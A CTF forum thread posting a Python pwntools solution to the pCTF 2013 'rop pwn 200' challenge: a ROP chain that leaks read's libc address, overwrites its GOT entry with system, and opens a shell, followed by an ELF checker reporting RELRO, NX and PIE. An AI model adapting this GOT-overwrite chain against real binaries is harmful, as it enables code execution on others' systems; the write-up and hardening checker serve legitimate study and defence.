[pCTF 2013] rop pwn 200

Practice area for hacking competition (CTF) problem write-ups

Moderator: amesianx

swoo1013
Posts: 31
Joined: Tue Sep 20, 2016 4:25 pm

[pCTF 2013] rop pwn 200

Post by swoo1013 » Tue Jan 10, 2017 12:14 pm

Code:

#!/usr/bin/env python3
# Python 3 / current pwntools version of the script; the ROP chain and all
# addresses are unchanged, pwntools' remote() replaces the raw socket + telnetlib pair.
import pwn


def p(s):
    return pwn.p32(s)


def u(s):
    return pwn.u32(s)


# connection
def conn():
    return pwn.remote('127.0.0.1', 1234)


# variable setting!
read_plt = 0x804832c
read_got = 0x804961c
write_plt = 0x804830c
write_got = 0x8049614
pppr = 0x80484b6           # pop; pop; pop; ret gadget: clears the 3 arguments of each call
binsh = b"/bin/sh\x00"
writeable_mem = 0x8049530  # writable slot in the binary that will hold "/bin/sh"
offset = 0x99a10           # read - system distance in the target's libc
print("exploit begin!!!\n")

s = conn()
payload = b"\x90" * 140    # padding up to the saved return address
# read(0, writeable_mem, len(binsh)): stage "/bin/sh" in writable memory
payload += p(read_plt)
payload += p(pppr)
payload += p(0)
payload += p(writeable_mem)
payload += p(len(binsh))

# write(1, read_got, 4): leak read's resolved libc address to calc the system() addr
payload += p(write_plt)
payload += p(pppr)
payload += p(1)
payload += p(read_got)
payload += p(4)            # one 32-bit GOT entry; the original len(str(read_got)) == 9 spilled into the next GOT slot

# read(0, read_got, 4): overwrite read's GOT entry with system's address
payload += p(read_plt)
payload += p(pppr)
payload += p(0)
payload += p(read_got)
payload += p(4)

# call system("/bin/sh") through the hijacked read@plt
payload += p(read_plt)
payload += b"aaaa"          # dummy system return!
payload += p(writeable_mem)

# send and recv data!
s.send(payload + b'\n')
s.send(binsh)
read = u(s.recvn(4))        # read's real (libc) address, exactly 4 bytes
system_addr = read - offset
print("system address : %s " % hex(system_addr))

s.send(p(system_addr))
s.interactive()

print("exploit end!!!\n")
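The chain in the post works only because the target binary leaves three conditions open: the GOT is writable (no full RELRO, so read@got can be overwritten), load addresses are fixed (no PIE, so read_plt, pppr and writeable_mem are constants), and the stack is non-executable, which is why the NOP sled is merely padding and the work is done by ROP. The following is an added example, not part of swoo1013's post or of the challenge: a small pure-Python ELF inspector that reports those three properties for a 32- or 64-bit little-endian ELF. The function names (parse_elf, hardening_report, build_test_elf32) are my own, and build_test_elf32 constructs a minimal, non-loadable ELF purely so the check can run offline without a real binary.

```python
import struct

# ELF constants (values from the ELF specification / glibc elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def parse_elf(data):
    """Return (e_type, program headers, dynamic tags) from raw ELF bytes (32- or 64-bit, little-endian)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    if is64:
        ehdr = struct.unpack_from("<16sHHIQQQIHHHHHH", data, 0)
        ph_fmt, dyn_fmt = "<IIQQQQQQ", "<qQ"   # Elf64_Phdr puts p_flags second
    else:
        ehdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
        ph_fmt, dyn_fmt = "<IIIIIIII", "<iI"   # Elf32_Phdr puts p_flags seventh
    e_type, e_phoff, e_phentsize, e_phnum = ehdr[1], ehdr[5], ehdr[9], ehdr[10]
    phdrs = []
    for i in range(e_phnum):
        f = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        if is64:
            p_type, p_flags, p_offset, p_filesz = f[0], f[1], f[2], f[5]
        else:
            p_type, p_offset, p_filesz, p_flags = f[0], f[1], f[4], f[6]
        phdrs.append({"type": p_type, "flags": p_flags, "offset": p_offset, "filesz": p_filesz})
    # Walk PT_DYNAMIC for the bind-now flags that turn partial RELRO into full RELRO.
    dyn = {}
    size = struct.calcsize(dyn_fmt)
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        off, end = ph["offset"], ph["offset"] + ph["filesz"]
        while off + size <= end:
            tag, val = struct.unpack_from(dyn_fmt, data, off)
            if tag == DT_NULL:
                break
            dyn[tag] = val
            off += size
    return e_type, phdrs, dyn


def hardening_report(data):
    """Report the three properties a GOT-overwrite ROP chain depends on."""
    e_type, phdrs, dyn = parse_elf(data)
    by_type = {ph["type"]: ph for ph in phdrs}
    bind_now = (DT_BIND_NOW in dyn
                or bool(dyn.get(DT_FLAGS, 0) & DF_BIND_NOW)
                or bool(dyn.get(DT_FLAGS_1, 0) & DF_1_NOW))
    if PT_GNU_RELRO not in by_type:
        relro = "none"          # GOT stays writable for the whole run
    elif bind_now:
        relro = "full"          # every import resolved at load time, GOT remapped read-only
    else:
        relro = "partial"       # lazy binding keeps the GOT writable, so read@got can be overwritten
    stack = by_type.get(PT_GNU_STACK)
    nx = stack is not None and not (stack["flags"] & PF_X)
    return {"relro": relro, "nx": nx, "pie": e_type == ET_DYN}


def build_test_elf32(relro, bind_now, nx_stack, pie):
    """Constructed, non-loadable 32-bit ELF (header + program headers + dynamic section),
    used only so the checks above can run offline; it is not a real binary."""
    dyn = b""
    if bind_now:
        dyn += struct.pack("<iI", DT_FLAGS, DF_BIND_NOW)
    dyn += struct.pack("<iI", DT_NULL, 0)
    n_ph = 2 + (1 if relro else 0)            # PT_DYNAMIC, PT_GNU_STACK, optional PT_GNU_RELRO
    dyn_off = 52 + 32 * n_ph                  # dynamic bytes follow the headers directly
    phdrs = [struct.pack("<IIIIIIII", PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), 6, 4)]
    if relro:
        phdrs.append(struct.pack("<IIIIIIII", PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    phdrs.append(struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, 6 if nx_stack else 7, 16))
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, little-endian, v1, SysV ABI
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, ET_DYN if pie else ET_EXEC, 3, 1,
                       0, 52, 0, 0, 52, 32, n_ph, 0, 0, 0)
    return ehdr + b"".join(phdrs) + dyn


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        data = open(sys.argv[1], "rb").read()
    else:
        data = build_test_elf32(relro=True, bind_now=False, nx_stack=True, pie=False)
    print(hardening_report(data))
```

Run it with the challenge binary as the argument to see which of the three conditions it satisfies. A "full" RELRO result means the read(0, read_got, 4) step cannot succeed because the GOT is read-only by the time user input is processed, and pie=True means the hard-coded read_plt, pppr and writeable_mem values no longer hold from one run to the next. The corresponding link flags are -Wl,-z,relro,-z,now for full RELRO and -fPIE -pie for PIE; a non-executable stack is the toolchain default unless -z execstack is given.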

h0n9t3n
Posts: 48
Joined: Tue Oct 13, 2015 11:14 am

Re: pctf 2013 rop pwn 200

Post by h0n9t3n » Tue Jan 10, 2017 6:37 pm

Oh, nice! :D
